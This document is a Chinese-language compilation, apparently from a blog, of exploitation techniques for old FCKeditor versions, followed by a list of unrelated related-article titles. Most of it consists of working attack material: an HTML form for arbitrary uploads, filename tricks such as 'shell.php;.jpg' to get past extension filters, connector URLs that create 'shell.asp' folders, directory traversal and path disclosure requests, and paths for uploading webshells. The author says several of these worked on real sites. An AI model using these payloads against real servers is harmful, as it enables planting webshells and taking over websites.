查看编辑器版本号
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————

2. Version 2.2 版本号
Apache+linux 环境下在上传文件后面加个.突破!測试通过。
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传随意文件!将下面保存为html文件,改动action地址。
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
        非常多时候上传的文件比如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
    4.1:提交shell.php+空格绕过
只是空格仅仅支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未測试。

4.2:继续上传同名文件可变为shell.php;(1).jpg 也能够新建一个文件夹,仅仅检測了第一级的文件夹,假设跳到二级文件夹就不受限制。
—————————————————————————————————————————————————————————————

5. 突破建立目录
FCKeditor/editor/filemanager/connectors/asp/connector.asp?

Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————

7.经常使用上传地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?

type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 測试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分改动为FCKeditor 实际使用的脚本语言,蓝色部分能够自己定义文
件夹名称也能够利用../..文件夹遍历。紫色部分为实际站点地址。
—————————————————————————————————————————————————————————————

8.其它上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般非常多网站都已删除_samples 文件夹。能够试试。

FCKeditor/editor/fckeditor.html 不能够上传文件,能够点击上传图片button再选择浏览server就可以跳转至可上传文件页。
—————————————————————————————————————————————————————————————

9.列文件夹漏洞也可助找上传地址
Version 2.4.1 測试通过
改动CurrentFolder 參数使用 ../../来进入不同的文件夹
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
依据返回的XML 信息能够查看站点全部的文件夹。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也能够直接浏览盘符:
JSP 版本号:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?

Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————

10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
        影响版本号: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描写叙述:
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 同意上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未測试]!
        而在apache 下,由于"Apache 文件名称解析缺陷漏洞"也能够利用之,另建议其它上传漏洞中定义TYPE 变量时使用File 类别来上传文件,依据FCKeditor 的代码,其限制最为狭隘。
        在上传时遇见可直接上传脚本文件固然非常好,但有些版本号可能无法直接上传能够利用在文件名称后面加.点或空格绕过,也能够利用2003 解析漏洞建立xxx.asp目录或者上传xx.asp;.jpg!
—————————————————————————————————————————————————————————————

12.最古老的漏洞。Type文件没有限制!
        我接触到的第一个fckeditor漏洞了。版本号不详。应该非常古老了,由于程序对type=xxx 的类型没有检查。我们能够直接构造上传把type=Image 改成Type=hsren 这样就能够建立一个叫hsren的目录,一个新类型,没有不论什么限制,能够上传随意脚本! 
—————————————————————————————————————————————————————————————

===============================================================================================================================================

FCK编辑器jsp版本号漏洞:

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?

Command=FileUpload&Type=Image&CurrentFolder=%2F

上传马所在文件夹
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
上传shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=connectors/jsp/connector
跟版本号有关系.并非百分百成功. 測试成功几个站.
不能通杀.非常遗憾.
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
假设以上地址不行能够试试
FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=/servlet/Connector
FCKeditor/_samples/
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html

Fckeditor常见漏洞的挖掘与利用整理汇总相关推荐

  1. SDCMS 1.1sp1的XSS漏洞的挖掘与利用

    本文已发<黑客防线>第六期(转载请注明) SDCMS全称:时代网站信息管理系统.SDCMS是基于ASP+ACCESS/MSSQL的网站信息管理系统.永久免费,开源! SDCMS以信息为主题 ...

  2. Web漏洞的挖掘与利用

    本文章仅供学习分享使用,不做任何违法行为!!! 一.漏洞的挖掘 sql注入漏洞: 判断一个网站是否存在一个sql注入的漏洞?Id=1 如果判断出来存在sql注入漏洞,则进判断sql注入的闭合字符 ?i ...

  3. clickjacking漏洞的挖掘与利用

    0x00简介 1 说起clickjacking,很多人其实都不知道是干嘛的.比起XSS来说,clickjacking显得比较神秘,乌云漏洞库里面的相关的漏洞也不到10条而已. 2 瞌睡龙之前发过一篇c ...

  4. 视频教程-SQL注入与SQLmap工具-漏洞挖掘与利用

    SQL注入与SQLmap工具 玄道,从混迹漏洞平台与SRC应急响应中心的白帽子到创业乙方的技术与运营 刘畅 ¥15.00 立即订阅 扫码下载「CSDN程序员学院APP」,1000+技术好课免费看 AP ...

  5. 视频教程-逆向工程:游戏安全入门教程-漏洞挖掘与利用

    逆向工程:游戏安全入门教程 杨闯(rkvir)天融信阿尔法实验室安全研究员.看雪漏洞分析小组成员,看雪讲师,MS08067小组成员.从事安全行业多年,擅长二进制安全领域的研究与工程化实现.有多年教育经 ...

  6. ctf中linux内核态的漏洞挖掘与利用系列1

    说明 该系列文章主要是从ctf比赛入手,针对linux内核上的漏洞分析.挖掘与利用做讲解,本篇文章主要介绍内核漏洞利用所需的前置知识以及准备工作. linux内核态与用户态的区别 以 Intel CP ...

  7. Linux系统漏洞复现分析,Linux环境下常见漏洞利用技术

    记得以前在drops写过一篇文章叫 linux常见漏洞利用技术实践 ,现在还可以找得到(https://woo.49.gs/static/drops/binary-6521.html), 不过当时开始 ...

  8. 常见漏洞的防御措施整理

    文章目录 0x01 注入攻击 风险说明 预防措施 0x02 文件上传漏洞 系统运行时的防御 系统开发阶段的防御 系统维护阶段 0x03 认证会话管理 0x04 访问控制 风险说明 防御措施 0x05 ...

  9. web渗透常见漏洞总结

    一.SQL注入 1. 原理 SQL:结构化查询语言 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. SQL注射能使攻 ...

最新文章

  1. How to change the status of Prepayment invoice
  2. python里的join方法_python中join()方法介绍
  3. Sass笔记(CSS 的预编译语言)
  4. sqoop的安装和使用
  5. springboot2.x 从零到一(1、快速创建服务)
  6. 两大微服务框架dubbo和spring cloud对比
  7. Android 自定义AlertDialog对话框
  8. 二逼平衡树 题解(树套树)
  9. python要求将字符串循环右移n次_python 基础知识
  10. 语音识别的原理_语音识别原理_语音识别原理框图 - 云+社区 - 腾讯云
  11. Java字符串查找第一个不重复字符_java如何实现获取字符串中第一个出现不重复的字符...
  12. matlab gui用edit,matlab gui edit 显示
  13. 信天游:电视剧《血色浪漫》插曲-杜老汉-拜年
  14. win10误禁用任务计划程序导致任务栏里的输入法丢失
  15. 主定理的证明及应用举例
  16. 单元测试Mock框架--Mockito
  17. 计算机专业考注册测绘师经验,测绘工程专业就业前景怎么样,武汉大学学子告诉你...
  18. 疯狂Java讲义(十三)----第二部分
  19. 看着大公司送的中秋礼物,我酸了。
  20. 上马”纯视觉L2/L2+级ADAS方案,特斯拉并非第一家

热门文章

  1. java对于app版本号比较,Java对比APP版本号大小
  2. webpack如何将css文件分离的,【Webpack小书】Webpack中如何将CSS样式抽取到独立文件中? - Tim的资源站...
  3. linux access函数_构建一个即时消息应用(九):Conversation 页面 | Linux 中国
  4. c语言游戏call调用,C语言-植物大战僵尸-刷僵尸call;fps游戏CS-方框透视(矩阵+传统)...
  5. Redis运维优化的陷阱及避坑指南
  6. 如何写一个脚本语言_如何写一个Nx schematic plugin?
  7. linux ftp 团队认证,linux下ftp和ftps以及ftp基于mysql虚拟用户认证服务器的搭建
  8. java第5天_java第5天的代码
  9. python中字典格式_如何在Python中使用带有字典的格式函数和整数键
  10. 实例创建流程_Activiti系列~3.流程定义